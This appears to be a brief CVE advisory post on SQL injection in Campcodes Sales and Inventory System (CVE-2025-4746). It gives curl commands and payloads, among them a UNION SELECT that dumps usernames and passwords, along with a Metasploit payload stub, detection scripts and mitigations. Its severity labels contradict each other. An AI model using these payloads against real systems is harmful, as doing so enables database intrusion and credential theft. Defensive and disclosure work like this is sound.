Campcodes Sales and Inventory System, SQL Injection, CVE-2025-4746 (Critical)

By /

Listen to this Post

How CVE-2025-4746 Works

This vulnerability exists in Campcodes Sales and Inventory System 1.0 due to improper input sanitization in the `/pages/purchase_delete.php` file. The `pr_id` parameter is directly concatenated into an SQL query without validation, allowing attackers to inject malicious SQL commands. Remote exploitation is possible by sending crafted HTTP requests containing SQL payloads. Successful exploitation can lead to unauthorized database access, data theft, or system compromise. The vulnerability has a CVSS 4.0 score of 6.9 (MEDIUM) with network-based attack vectors requiring no privileges or user interaction.

DailyCVE Form

Platform: Campcodes S&I
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/03/2025

Prediction: Patch by 08/2025

What Undercode Say:

Exploitation Commands:

curl -X POST "http://target/pages/purchase_delete.php" -d "pr_id=1' OR 1=1--"

1' UNION SELECT username,password FROM users--

Detection Script (Python):

import requests
url = "http://target/pages/purchase_delete.php"
payload = "pr_id=1'"
response = requests.post(url, data=payload)
if "SQL syntax" in response.text:
print("Vulnerable to CVE-2025-4746")

Mitigation Steps:

1. Apply input validation using prepared statements:

$stmt = $conn->prepare("DELETE FROM purchases WHERE id = ?");
$stmt->bind_param("i", $_POST['pr_id']);

2. Deploy WAF rules to block SQLi patterns.

3. Disable error messages in production.

Log Analysis (Post-Exploitation):

grep 'purchase_delete.php' /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

Exploit PoC (Metasploit Module Skeleton):

'Payload' => { 'pr_id' => "' UNION SELECT @@version--" }

Database Hardening:

REVOKE DELETE ON purchases FROM 'app_user'@'%';

Emergency Patch (Temporary Fix):

if (!is_numeric($_POST['pr_id'])) { die("Invalid input"); }

Network-Based Protection:

iptables -A INPUT -p tcp --dport 80 -m string --string "UNION SELECT" -j DROP

Vulnerability Scanner Query (Nuclei):

id: CVE-2025-4746
info:
name: Campcodes SQLi
request:
method: POST
path: "/pages/purchase_delete.php"
body: "pr_id=1'"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top